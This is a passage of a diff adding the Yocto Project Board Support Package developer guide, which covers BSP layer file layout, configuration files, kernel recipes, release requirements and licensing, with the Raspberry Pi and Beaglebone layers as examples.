+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/10-evdev.conf
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/98-pitft.conf
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/99-calibration.conf
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config_0.1.bbappend
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xorg_%.bbappend
+ meta-raspberrypi/recipes-kernel
+ meta-raspberrypi/recipes-kernel/linux-firmware
+ meta-raspberrypi/recipes-kernel/linux-firmware/files
+ meta-raspberrypi/recipes-kernel/linux-firmware/files/brcmfmac43430-sdio.bin
+ meta-raspberrypi/recipes-kernel/linux-firmware/files/brcfmac43430-sdio.txt
+ meta-raspberrypi/recipes-kernel/linux-firmware/linux-firmware_%.bbappend
+ meta-raspberrypi/recipes-kernel/linux
+ meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb
+ meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi.inc
+ meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.14.bb
+ meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.9.bb
+ meta-raspberrypi/recipes-multimedia
+ meta-raspberrypi/recipes-multimedia/gstreamer
+ meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx
+ meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx/*.patch
+ meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx_%.bbappend
+ meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_%.bbappend
+ meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12
+ meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12/*.patch
+ meta-raspberrypi/recipes-multimedia/omxplayer
+ meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer
+ meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer/*.patch
+ meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb
+ meta-raspberrypi/recipes-multimedia/x264
+ meta-raspberrypi/recipes-multimedia/x264/x264_git.bbappend
+ meta-raspberrypi/wic meta-raspberrypi/wic/sdimage-raspberrypi.wks
+
+The following sections describe each part of the proposed BSP format.
+
+.. _bsp-filelayout-license:
+
+License Files
+-------------
+
+You can find these files in the BSP Layer at: ::
+
+ meta-bsp_root_name/bsp_license_file
+
+These optional files satisfy licensing requirements for the BSP. The
+type or types of files here can vary depending on the licensing
+requirements. For example, in the Raspberry Pi BSP, all licensing
+requirements are handled with the ``COPYING.MIT`` file.
+
+Licensing files can be MIT, BSD, GPLv*, and so forth. These files are
+recommended for the BSP but are optional and totally up to the BSP
+developer. For information on how to maintain license compliance, see
+the ":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _bsp-filelayout-readme:
+
+README File
+-----------
+
+You can find this file in the BSP Layer at: ::
+
+ meta-bsp_root_name/README
+
+This file provides information on how to boot the live images that are
+optionally included in the ``binary/`` directory. The ``README`` file
+also provides information needed for building the image.
+
+At a minimum, the ``README`` file must contain a list of dependencies,
+such as the names of any other layers on which the BSP depends and the
+name of the BSP maintainer with his or her contact information.
+
+.. _bsp-filelayout-readme-sources:
+
+README.sources File
+-------------------
+
+You can find this file in the BSP Layer at: ::
+
+ meta-bsp_root_name/README.sources
+
+This file provides information on where to locate the BSP source files
+used to build the images (if any) that reside in
+``meta-bsp_root_name/binary``. Images in the ``binary`` would be images
+released with the BSP. The information in the ``README.sources`` file
+also helps you find the :term:`Metadata`
+used to generate the images that ship with the BSP.
+
+.. note::
+
+ If the BSP's ``binary`` directory is missing or the directory has no images, an
+ existing ``README.sources`` file is meaningless and usually does not exist.
+
+.. _bsp-filelayout-binary:
+
+Pre-built User Binaries
+-----------------------
+
+You can find these files in the BSP Layer at: ::
+
+ meta-bsp_root_name/binary/bootable_images
+
+This optional area contains useful pre-built kernels and user-space
+filesystem images released with the BSP that are appropriate to the
+target system. This directory typically contains graphical (e.g. Sato)
+and minimal live images when the BSP tarball has been created and made
+available in the :yocto_home:`Yocto Project <>` website. You can
+use these kernels and images to get a system running and quickly get
+started on development tasks.
+
+The exact types of binaries present are highly hardware-dependent. The
+:ref:`README <bsp-guide/bsp:readme file>` file should be present in the
+BSP Layer and it explains how to use the images with the target
+hardware. Additionally, the
+:ref:`README.sources <bsp-guide/bsp:readme.sources file>` file should be
+present to locate the sources used to build the images and provide
+information on the Metadata.
+
+.. _bsp-filelayout-layer:
+
+Layer Configuration File
+------------------------
+
+You can find this file in the BSP Layer at: ::
+
+ meta-bsp_root_name/conf/layer.conf
+
+The ``conf/layer.conf`` file identifies the file structure as a layer,
+identifies the contents of the layer, and contains information about how
+the build system should use it. Generally, a standard boilerplate file
+such as the following works. In the following example, you would replace
+"bsp" with the actual name of the BSP (i.e. "bsp_root_name" from the example
+template). ::
+
+ # We have a conf and classes directory, add to BBPATH
+ BBPATH .= ":${LAYERDIR}"
+
+ # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
+ BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+ ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+ BBFILE_COLLECTIONS += "bsp"
+ BBFILE_PATTERN_bsp = "^${LAYERDIR}/"
+ BBFILE_PRIORITY_bsp = "6"
+ LAYERDEPENDS_bsp = "intel"
+
+To illustrate the string substitutions, here are the corresponding
+statements from the Raspberry Pi ``conf/layer.conf`` file: ::
+
+ # We have a conf and classes directory, append to BBPATH
+ BBPATH .= ":${LAYERDIR}"
+
+ # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
+ BBFILES += "${LAYERDIR}/recipes*/*/*.bb \
+ ${LAYERDIR}/recipes*/*/*.bbappend"
+
+ BBFILE_COLLECTIONS += "raspberrypi"
+ BBFILE_PATTERN_raspberrypi := "^${LAYERDIR}/"
+ BBFILE_PRIORITY_raspberrypi = "9"
+
+ # Additional license directories.
+ LICENSE_PATH += "${LAYERDIR}/files/custom-licenses"
+ .
+ .
+ .
+
+This file simply makes :term:`BitBake` aware of the recipes and configuration
+directories. The file must exist so that the OpenEmbedded build system can
+recognize the BSP.
+
+.. _bsp-filelayout-machine:
+
+Hardware Configuration Options
+------------------------------
+
+You can find these files in the BSP Layer at: ::
+
+ meta-bsp_root_name/conf/machine/*.conf
+
+The machine files bind together all the information contained elsewhere
+in the BSP into a format that the build system can understand. Each BSP
+Layer requires at least one machine file. If the BSP supports multiple
+machines, multiple machine configuration files can exist. These
+filenames correspond to the values to which users have set the
+:term:`MACHINE` variable.
+
+These files define things such as the kernel package to use
+(:term:`PREFERRED_PROVIDER` of
+:ref:`virtual/kernel <dev-manual/dev-manual-common-tasks:using virtual providers>`),
+the hardware drivers to include in different types of images, any
+special software components that are needed, any bootloader information,
+and also any special image format requirements.
+
+This configuration file could also include a hardware "tuning" file that
+is commonly used to define the package architecture and specify
+optimization flags, which are carefully chosen to give best performance
+on a given processor.
+
+Tuning files are found in the ``meta/conf/machine/include`` directory
+within the :term:`Source Directory`.
+For example, many ``tune-*`` files (e.g. ``tune-arm1136jf-s.inc``,
+``tune-1586-nlp.inc``, and so forth) reside in the
+``poky/meta/conf/machine/include`` directory.
+
+To use an include file, you simply include them in the machine
+configuration file. For example, the Raspberry Pi BSP
+``raspberrypi3.conf`` contains the following statement: ::
+
+ include conf/machine/include/rpi-base.inc
+
+.. _bsp-filelayout-misc-recipes:
+
+Miscellaneous BSP-Specific Recipe Files
+---------------------------------------
+
+You can find these files in the BSP Layer at: ::
+
+ meta-bsp_root_name/recipes-bsp/*
+
+This optional directory contains miscellaneous recipe files for the BSP.
+Most notably would be the formfactor files. For example, in the
+Raspberry Pi BSP, there is the ``formfactor_0.0.bbappend`` file, which
+is an append file used to augment the recipe that starts the build.
+Furthermore, there are machine-specific settings used during the build
+that are defined by the ``machconfig`` file further down in the
+directory. Here is the ``machconfig`` file for the Raspberry Pi BSP: ::
+
+ HAVE_TOUCHSCREEN=0
+ HAVE_KEYBOARD=1
+
+ DISPLAY_CAN_ROTATE=0
+ DISPLAY_ORIENTATION=0
+ DISPLAY_DPI=133
+
+.. note::
+
+ If a BSP does not have a formfactor entry, defaults are established
+ according to the formfactor configuration file that is installed by
+ the main formfactor recipe
+ ``meta/recipes-bsp/formfactor/formfactor_0.0.bb``, which is found in
+ the :term:`Source Directory`.
+
+.. _bsp-filelayout-recipes-graphics:
+
+Display Support Files
+---------------------
+
+You can find these files in the BSP Layer at: ::
+
+ meta-bsp_root_name/recipes-graphics/*
+
+This optional directory contains recipes for the BSP if it has special
+requirements for graphics support. All files that are needed for the BSP
+to support a display are kept here.
+
+.. _bsp-filelayout-kernel:
+
+Linux Kernel Configuration
+--------------------------
+
+You can find these files in the BSP Layer at: ::
+
+ meta-bsp_root_name/recipes-kernel/linux/linux*.bbappend
+ meta-bsp_root_name/recipes-kernel/linux/*.bb
+
+Append files (``*.bbappend``) modify the main kernel recipe being used
+to build the image. The ``*.bb`` files would be a developer-supplied
+kernel recipe. This area of the BSP hierarchy can contain both these
+types of files although, in practice, it is likely that you would have
+one or the other.
+
+For your BSP, you typically want to use an existing Yocto Project kernel
+recipe found in the :term:`Source Directory`
+at
+``meta/recipes-kernel/linux``. You can append machine-specific changes
+to the kernel recipe by using a similarly named append file, which is
+located in the BSP Layer for your target device (e.g. the
+``meta-bsp_root_name/recipes-kernel/linux`` directory).
+
+Suppose you are using the ``linux-yocto_4.4.bb`` recipe to build the
+kernel. In other words, you have selected the kernel in your
+``"bsp_root_name".conf`` file by adding
+:term:`PREFERRED_PROVIDER` and :term:`PREFERRED_VERSION`
+statements as follows: ::
+
+ PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+ PREFERRED_VERSION_linux-yocto ?= "4.4%"
+
+.. note::
+
+ When the preferred provider is assumed by default, the ``PREFERRED_PROVIDER``
+ statement does not appear in the ``"bsp_root_name".conf`` file.
+
+You would use the ``linux-yocto_4.4.bbappend`` file to append specific
+BSP settings to the kernel, thus configuring the kernel for your
+particular BSP.
+
+You can find more information on what your append file should contain in
+the ":ref:`kernel-dev/kernel-dev-common:creating the append file`" section
+in the Yocto Project Linux Kernel Development Manual.
+
+An alternate scenario is when you create your own kernel recipe for the
+BSP. A good example of this is the Raspberry Pi BSP. If you examine the
+``recipes-kernel/linux`` directory you see the following: ::
+
+ linux-raspberrypi-dev.bb
+ linux-raspberrypi.inc
+ linux-raspberrypi_4.14.bb
+ linux-raspberrypi_4.9.bb
+
+The directory contains three kernel recipes and a common include file.
+
+Developing a Board Support Package (BSP)
+========================================
+
+This section describes the high-level procedure you can follow to create
+a BSP. Although not required for BSP creation, the ``meta-intel``
+repository, which contains many BSPs supported by the Yocto Project, is
+part of the example.
+
+For an example that shows how to create a new layer using the tools, see
+the ":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section.
+
+The following illustration and list summarize the BSP creation general
+workflow.
+
+.. image:: figures/bsp-dev-flow.png
+ :align: center
+
+#. *Set up Your Host Development System to Support Development Using the
+ Yocto Project*: See the ":ref:`dev-manual/dev-manual-start:preparing the build host`"
+ section in the Yocto Project Development Tasks Manual for options on how to
+ get a system ready to use the Yocto Project.
+
+#. *Establish the meta-intel Repository on Your System:* Having
+ local copies of these supported BSP layers on your system gives you
+ access to layers you might be able to leverage when creating your
+ BSP. For information on how to get these files, see the
+ ":ref:`bsp-guide/bsp:preparing your build host to work with bsp layers`"
+ section.
+
+#. *Create Your Own BSP Layer Using the bitbake-layers Script:*
+ Layers are ideal for isolating and storing work for a given piece of
+ hardware. A layer is really just a location or area in which you
+ place the recipes and configurations for your BSP. In fact, a BSP is,
+ in itself, a special type of layer. The simplest way to create a new
+ BSP layer that is compliant with the Yocto Project is to use the
+ ``bitbake-layers`` script. For information about that script, see the
+ ":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+ section.
+
+ Another example that illustrates a layer is an application. Suppose
+ you are creating an application that has library or other
+ dependencies in order for it to compile and run. The layer, in this
+ case, would be where all the recipes that define those dependencies
+ are kept. The key point for a layer is that it is an isolated area
+ that contains all the relevant information for the project that the
+ OpenEmbedded build system knows about. For more information on
+ layers, see the ":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+ section in the Yocto Project Overview and Concepts Manual. You can also
+ reference the ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+ section in the Yocto Project Development Tasks Manual. For more
+ information on BSP layers, see the ":ref:`bsp-guide/bsp:bsp layers`"
+ section.
+
+ .. note::
+
+ - Four hardware reference BSPs exist that are part of the Yocto
+ Project release and are located in the ``poky/meta-yocto-bsp``
+ BSP layer:
+
+ - Texas Instruments Beaglebone (``beaglebone-yocto``)
+
+ - Ubiquiti Networks EdgeRouter Lite (``edgerouter``)
+
+ - Two general IA platforms (``genericx86`` and ``genericx86-64``)
+
+ - Three core Intel BSPs exist as part of the Yocto Project
+ release in the ``meta-intel`` layer:
+
+ - ``intel-core2-32``, which is a BSP optimized for the Core2
+ family of CPUs as well as all CPUs prior to the Silvermont
+ core.
+
+ - ``intel-corei7-64``, which is a BSP optimized for Nehalem
+ and later Core and Xeon CPUs as well as Silvermont and later
+ Atom CPUs, such as the Baytrail SoCs.
+
+ - ``intel-quark``, which is a BSP optimized for the Intel
+ Galileo gen1 & gen2 development boards.
+
+ When you set up a layer for a new BSP, you should follow a standard
+ layout. This layout is described in the ":ref:`bsp-guide/bsp:example filesystem layout`"
+ section. In the standard layout, notice
+ the suggested structure for recipes and configuration information.
+ You can see the standard layout for a BSP by examining any supported
+ BSP found in the ``meta-intel`` layer inside the Source Directory.
+
+#. *Make Configuration Changes to Your New BSP Layer:* The standard BSP
+ layer structure organizes the files you need to edit in ``conf`` and
+ several ``recipes-*`` directories within the BSP layer. Configuration
+ changes identify where your new layer is on the local system and
+ identifies the kernel you are going to use. When you run the
+ ``bitbake-layers`` script, you are able to interactively configure
+ many things for the BSP (e.g. keyboard, touchscreen, and so forth).
+
+#. *Make Recipe Changes to Your New BSP Layer:* Recipe changes include
+ altering recipes (``*.bb`` files), removing recipes you do not use,
+ and adding new recipes or append files (``.bbappend``) that support
+ your hardware.
+
+#. *Prepare for the Build:* Once you have made all the changes to your
+ BSP layer, there remains a few things you need to do for the
+ OpenEmbedded build system in order for it to create your image. You
+ need to get the build environment ready by sourcing an environment
+ setup script (i.e. ``oe-init-build-env``) and you need to be sure two
+ key configuration files are configured appropriately: the
+ ``conf/local.conf`` and the ``conf/bblayers.conf`` file. You must
+ make the OpenEmbedded build system aware of your new layer. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:enabling your layer`"
+ section in the Yocto Project Development Tasks Manual for information
+ on how to let the build system know about your new layer.
+
+#. *Build the Image:* The OpenEmbedded build system uses the BitBake
+ tool to build images based on the type of image you want to create.
+ You can find more information about BitBake in the
+ :doc:`BitBake User Manual <bitbake:index>`.
+
+ The build process supports several types of images to satisfy
+ different needs. See the
+ ":ref:`ref-manual/ref-images:Images`" chapter in the Yocto
+ Project Reference Manual for information on supported images.
+
+Requirements and Recommendations for Released BSPs
+==================================================
+
+Certain requirements exist for a released BSP to be considered compliant
+with the Yocto Project. Additionally, recommendations also exist. This
+section describes the requirements and recommendations for released
+BSPs.
+
+Released BSP Requirements
+-------------------------
+
+Before looking at BSP requirements, you should consider the following:
+
+- The requirements here assume the BSP layer is a well-formed, "legal"
+ layer that can be added to the Yocto Project. For guidelines on
+ creating a layer that meets these base requirements, see the
+ ":ref:`bsp-guide/bsp:bsp layers`" section in this manual and the
+ ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+ section in the Yocto Project Development Tasks Manual.
+
+- The requirements in this section apply regardless of how you package
+ a BSP. You should consult the packaging and distribution guidelines
+ for your specific release process. For an example of packaging and
+ distribution requirements, see the ":yocto_wiki:`Third Party BSP Release
+ Process </wiki/Third_Party_BSP_Release_Process>`"
+ wiki page.
+
+- The requirements for the BSP as it is made available to a developer
+ are completely independent of the released form of the BSP. For
+ example, the BSP Metadata can be contained within a Git repository
+ and could have a directory structure completely different from what
+ appears in the officially released BSP layer.
+
+- It is not required that specific packages or package modifications
+ exist in the BSP layer, beyond the requirements for general
+ compliance with the Yocto Project. For example, no requirement exists
+ dictating that a specific kernel or kernel version be used in a given
+ BSP.
+
+Following are the requirements for a released BSP that conform to the
+Yocto Project:
+
+- *Layer Name:* The BSP must have a layer name that follows the Yocto
+ Project standards. For information on BSP layer names, see the
+ ":ref:`bsp-guide/bsp:bsp layers`" section.
+
+- *File System Layout:* When possible, use the same directory names in
+ your BSP layer as listed in the ``recipes.txt`` file, which is found
+ in ``poky/meta`` directory of the :term:`Source Directory`
+ or in the OpenEmbedded-Core Layer (``openembedded-core``) at
+ https://git.openembedded.org/openembedded-core/tree/meta.
+
+ You should place recipes (``*.bb`` files) and recipe modifications
+ (``*.bbappend`` files) into ``recipes-*`` subdirectories by
+ functional area as outlined in ``recipes.txt``. If you cannot find a
+ category in ``recipes.txt`` to fit a particular recipe, you can make
+ up your own ``recipes-*`` subdirectory.
+
+ Within any particular ``recipes-*`` category, the layout should match
+ what is found in the OpenEmbedded-Core Git repository
+ (``openembedded-core``) or the Source Directory (``poky``). In other
+ words, make sure you place related files in appropriately-related
+ ``recipes-*`` subdirectories specific to the recipe's function, or
+ within a subdirectory containing a set of closely-related recipes.
+ The recipes themselves should follow the general guidelines for
+ recipes used in the Yocto Project found in the "`OpenEmbedded Style
+ Guide <http://openembedded.org/wiki/Styleguide>`__".
+
+- *License File:* You must include a license file in the
+ ``meta-bsp_root_name`` directory. This license covers the BSP
+ Metadata as a whole. You must specify which license to use since no
+ default license exists when one is not specified. See the
+ :yocto_git:`COPYING.MIT </cgit.cgi/meta-raspberrypi/tree/COPYING.MIT>`
+ file for the Raspberry Pi BSP in the ``meta-raspberrypi`` BSP layer
+ as an example.
+
+- *README File:* You must include a ``README`` file in the
+ ``meta-bsp_root_name`` directory. See the
+ :yocto_git:`README.md </cgit.cgi/meta-raspberrypi/tree/README.md>`
+ file for the Raspberry Pi BSP in the ``meta-raspberrypi`` BSP layer
+ as an example.
+
+ At a minimum, the ``README`` file should contain the following:
+
+ - A brief description of the target hardware.
+
+ - A list of all the dependencies of the BSP. These dependencies are
+ typically a list of required layers needed to build the BSP.
+ However, the dependencies should also contain information
+ regarding any other dependencies the BSP might have.
+
+ - Any required special licensing information. For example, this
+ information includes information on special variables needed to
+ satisfy a EULA, or instructions on information needed to build or
+ distribute binaries built from the BSP Metadata.
+
+ - The name and contact information for the BSP layer maintainer.
+ This is the person to whom patches and questions should be sent.
+ For information on how to find the right person, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+ section in the Yocto Project Development Tasks Manual.
+
+ - Instructions on how to build the BSP using the BSP layer.
+
+ - Instructions on how to boot the BSP build from the BSP layer.
+
+ - Instructions on how to boot the binary images contained in the
+ ``binary`` directory, if present.
+
+ - Information on any known bugs or issues that users should know
+ about when either building or booting the BSP binaries.
+
+- *README.sources File:* If your BSP contains binary images in the
+ ``binary`` directory, you must include a ``README.sources`` file in
+ the ``meta-bsp_root_name`` directory. This file specifies exactly
+ where you can find the sources used to generate the binary images.
+
+- *Layer Configuration File:* You must include a ``conf/layer.conf``
+ file in the ``meta-bsp_root_name`` directory. This file identifies
+ the ``meta-bsp_root_name`` BSP layer as a layer to the build
+ system.
+
+- *Machine Configuration File:* You must include one or more
+ ``conf/machine/bsp_root_name.conf`` files in the
+ ``meta-bsp_root_name`` directory. These configuration files define
+ machine targets that can be built using the BSP layer. Multiple
+ machine configuration files define variations of machine
+ configurations that the BSP supports. If a BSP supports multiple
+ machine variations, you need to adequately describe each variation in
+ the BSP ``README`` file. Do not use multiple machine configuration
+ files to describe disparate hardware. If you do have very different
+ targets, you should create separate BSP layers for each target.
+
+ .. note::
+
+ It is completely possible for a developer to structure the working
+ repository as a conglomeration of unrelated BSP files, and to possibly
+ generate BSPs targeted for release from that directory using scripts or
+ some other mechanism (e.g. ``meta-yocto-bsp`` layer). Such considerations
+ are outside the scope of this document.
+
+Released BSP Recommendations
+----------------------------
+
+Following are recommendations for released BSPs that conform to the
+Yocto Project:
+
+- *Bootable Images:* Released BSPs can contain one or more bootable
+ images. Including bootable images allows users to easily try out the
+ BSP using their own hardware.
+
+ In some cases, it might not be convenient to include a bootable
+ image. If so, you might want to make two versions of the BSP
+ available: one that contains binary images, and one that does not.
+ The version that does not contain bootable images avoids unnecessary
+ download times for users not interested in the images.
+
+ If you need to distribute a BSP and include bootable images or build
+ kernel and filesystems meant to allow users to boot the BSP for
+ evaluation purposes, you should put the images and artifacts within a
+ ``binary/`` subdirectory located in the ``meta-bsp_root_name``
+ directory.
+
+ .. note::
+
+ If you do include a bootable image as part of the BSP and the
+ image was built by software covered by the GPL or other open
+ source licenses, it is your responsibility to understand and meet
+ all licensing requirements, which could include distribution of
+ source files.
+
+- *Use a Yocto Linux Kernel:* Kernel recipes in the BSP should be based
+ on a Yocto Linux kernel. Basing your recipes on these kernels reduces
+ the costs for maintaining the BSP and increases its scalability. See
+ the ``Yocto Linux Kernel`` category in the
+ :yocto_git:`Source Repositories <>` for these kernels.
+
+Customizing a Recipe for a BSP
+==============================
+
+If you plan on customizing a recipe for a particular BSP, you need to do
+the following:
+
+- Create a ``*.bbappend`` file for the modified recipe. For information on using
+ append files, see the ":ref:`dev-manual/dev-manual-common-tasks:using
+ .bbappend files in your layer`" section in the Yocto Project Development
+ Tasks Manual.
+
+- Ensure your directory structure in the BSP layer that supports your
+ machine is such that the OpenEmbedded build system can find it. See
+ the example later in this section for more information.
+
+- Put the append file in a directory whose name matches the machine's
+ name and is located in an appropriate sub-directory inside the BSP
+ layer (i.e. ``recipes-bsp``, ``recipes-graphics``, ``recipes-core``,
+ and so forth).
+
+- Place the BSP-specific files in the proper directory inside the BSP
+ layer. How expansive the layer is affects where you must place these
+ files. For example, if your layer supports several different machine
+ types, you need to be sure your layer's directory structure includes
+ hierarchy that separates the files according to machine. If your
+ layer does not support multiple machines, the layer would not have
+ that additional hierarchy and the files would obviously not be able
+ to reside in a machine-specific directory.
+
+Following is a specific example to help you better understand the
+process. This example customizes customizes a recipe by adding a
+BSP-specific configuration file named ``interfaces`` to the
+``init-ifupdown_1.0.bb`` recipe for machine "xyz" where the BSP layer
+also supports several other machines:
+
+#. Edit the ``init-ifupdown_1.0.bbappend`` file so that it contains the
+ following: ::
+
+ FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
+
+ The append file needs to be in the ``meta-xyz/recipes-core/init-ifupdown``
+ directory.
+
+#. Create and place the new ``interfaces`` configuration file in the
+ BSP's layer here: ::
+
+ meta-xyz/recipes-core/init-ifupdown/files/xyz-machine-one/interfaces
+
+ .. note::
+
+ If the ``meta-xyz`` layer did not support multiple machines, you would place
+ the interfaces configuration file in the layer here: ::
+
+ meta-xyz/recipes-core/init-ifupdown/files/interfaces
+
+ The :term:`FILESEXTRAPATHS` variable in the append files extends the search
+ path the build system uses to find files during the build. Consequently, for
+ this example you need to have the ``files`` directory in the same location as
+ your append file.
+
+BSP Licensing Considerations
+============================
+
+In some cases, a BSP contains separately-licensed Intellectual Property
+(IP) for a component or components. For these cases, you are required to
+accept the terms of a commercial or other type of license that requires
+some kind of explicit End User License Agreement (EULA). Once you accept
+the license, the OpenEmbedded build system can then build and include
+the corresponding component in the final BSP image. If the BSP is
+available as a pre-built image, you can download the image after
+agreeing to the license or EULA.
+
+You could find that some separately-licensed components that are
+essential for normal operation of the system might not have an
+unencumbered (or free) substitute. Without these essential components,
+the system would be non-functional. Then again, you might find that
+other licensed components that are simply 'good-to-have' or purely
+elective do have an unencumbered, free replacement component that you
+can use rather than agreeing to the separately-licensed component. Even
+for components essential to the system, you might find an unencumbered
+component that is not identical but will work as a less-capable version
+of the licensed version in the BSP recipe.
+
+For cases where you can substitute a free component and still maintain
+the system's functionality, the "DOWNLOADS" selection from the
+"SOFTWARE" tab on the :yocto_home:`Yocto Project Website <>` makes
+available de-featured BSPs that are completely free of any IP
+encumbrances. For these cases, you can use the substitution directly and
+without any further licensing requirements. If present, these fully
+de-featured BSPs are named appropriately different as compared to the
+names of their respective encumbered BSPs. If available, these
+substitutions are your simplest and most preferred options. Obviously,
+use of these substitutions assumes the resulting functionality meets
+system requirements.
+
+.. note::
+
+ If however, a non-encumbered version is unavailable or it provides
+ unsuitable functionality or quality, you can use an encumbered
+ version.
+
+A couple different methods exist within the OpenEmbedded build system to
+satisfy the licensing requirements for an encumbered BSP. The following
+list describes them in order of preference:
+
+#. *Use the LICENSE_FLAGS Variable to Define the Recipes that Have Commercial or
+ Other Types of Specially-Licensed Packages:* For each of those recipes, you can
+ specify a matching license string in a ``local.conf`` variable named
+ :term:`LICENSE_FLAGS_WHITELIST`.
+ Specifying the matching license string signifies that you agree to
+ the license. Thus, the build system can build the corresponding
+ recipe and include the component in the image. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:enabling commercially licensed recipes`"
+ section in the Yocto Project Development Tasks Manual for details on
+ how to use these variables.
+
+ If you build as you normally would, without specifying any recipes in
+ the ``LICENSE_FLAGS_WHITELIST``, the build stops and provides you
+ with the list of recipes that you have tried to include in the image
+ that need entries in the ``LICENSE_FLAGS_WHITELIST``. Once you enter
+ the appropriate license flags into the whitelist, restart the build
+ to continue where it left off. During the build, the prompt will not
+ appear again since you have satisfied the requirement.
+
+ Once the appropriate license flags are on the white list in the
+ ``LICENSE_FLAGS_WHITELIST`` variable, you can build the encumbered
+ image with no change at all to the normal build process.
+
+#. *Get a Pre-Built Version of the BSP:* You can get this type of BSP by
+ selecting the "DOWNLOADS" item from the "SOFTWARE" tab on the
+ :yocto_home:`Yocto Project website <>`. You can download BSP tarballs
+ that contain proprietary components after agreeing to the licensing
+ requirements of each of the individually encumbered packages as part
+ of the download process. Obtaining the BSP this way allows you to
+ access an encumbered image immediately after agreeing to the
+ click-through license agreements presented by the website. If you
+ want to build the image yourself using the recipes contained within
+ the BSP tarball, you will still need to create an appropriate
+ ``LICENSE_FLAGS_WHITELIST`` to match the encumbered recipes in the
+ BSP.
+
+.. note::
+
+ Pre-compiled images are bundled with a time-limited kernel that runs
+ for a predetermined amount of time (10 days) before it forces the
+ system to reboot. This limitation is meant to discourage direct
+ redistribution of the image. You must eventually rebuild the image if
+ you want to remove this restriction.
+
+Creating a new BSP Layer Using the ``bitbake-layers`` Script
+============================================================
+
+The ``bitbake-layers create-layer`` script automates creating a BSP
+layer. What makes a layer a "BSP layer" is the presence of at least one
+machine configuration file. Additionally, a BSP layer usually has a
+kernel recipe or an append file that leverages off an existing kernel
+recipe. The primary requirement, however, is the machine configuration.
+
+Use these steps to create a BSP layer:
+
+- *Create a General Layer:* Use the ``bitbake-layers`` script with the
+ ``create-layer`` subcommand to create a new general layer. For
+ instructions on how to create a general layer using the
+ ``bitbake-layers`` script, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the \`\`bitbake-layers\`\` script`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *Create a Layer Configuration File:* Every layer needs a layer
+ configuration file. This configuration file establishes locations for
+ the layer's recipes, priorities for the layer, and so forth. You can
+ find examples of ``layer.conf`` files in the Yocto Project
+ :yocto_git:`Source Repositories <>`. To get examples of what you need
+ in your configuration file, locate a layer (e.g. "meta-ti") and
+ examine the
+ :yocto_git:`local.conf </cgit/cgit.cgi/meta-ti/tree/conf/layer.conf>`
+ file.
+
+- *Create a Machine Configuration File:* Create a
+ ``conf/machine/bsp_root_name.conf`` file. See
+ :yocto_git:`meta-yocto-bsp/conf/machine </cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf/machine>`
+ for sample ``bsp_root_name.conf`` files. Other samples such as
+ :yocto_git:`meta-ti </cgit/cgit.cgi/meta-ti/tree/conf/machine>`
+ and
+ :yocto_git:`meta-freescale </cgit/cgit.cgi/meta-freescale/tree/conf/machine>`
+ exist from other vendors that have more specific machine and tuning
+ examples.
+
+- *Create a Kernel Recipe:* Create a kernel recipe in
+ ``recipes-kernel/linux`` by either using a kernel append file or a
+ new custom kernel recipe file (e.g. ``yocto-linux_4.12.bb``). The BSP
+ layers mentioned in the previous step also contain different kernel
+ examples. See the ":ref:`kernel-dev/kernel-dev-common:modifying an existing recipe`"
+ section in the Yocto Project Linux Kernel Development Manual for
+ information on how to create a custom kernel.
+
+The remainder of this section provides a description of the Yocto
+Project reference BSP for Beaglebone, which resides in the
+:yocto_git:`meta-yocto-bsp </cgit/cgit.cgi/poky/tree/meta-yocto-bsp>`
+layer.
+
+BSP Layer Configuration Example
+-------------------------------
+
+The layer's ``conf`` directory contains the ``layer.conf`` configuration
+file. In this example, the ``conf/layer.conf`` is the following: ::
+
+ # We have a conf and classes directory, add to BBPATH
+ BBPATH .= ":${LAYERDIR}"
+
+ # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
+ BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
+ ${LAYERDIR}/recipes-*/*/*.bbappend"
+
+ BBFILE_COLLECTIONS += "yoctobsp"
+ BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
+ BBFILE_PRIORITY_yoctobsp = "5"
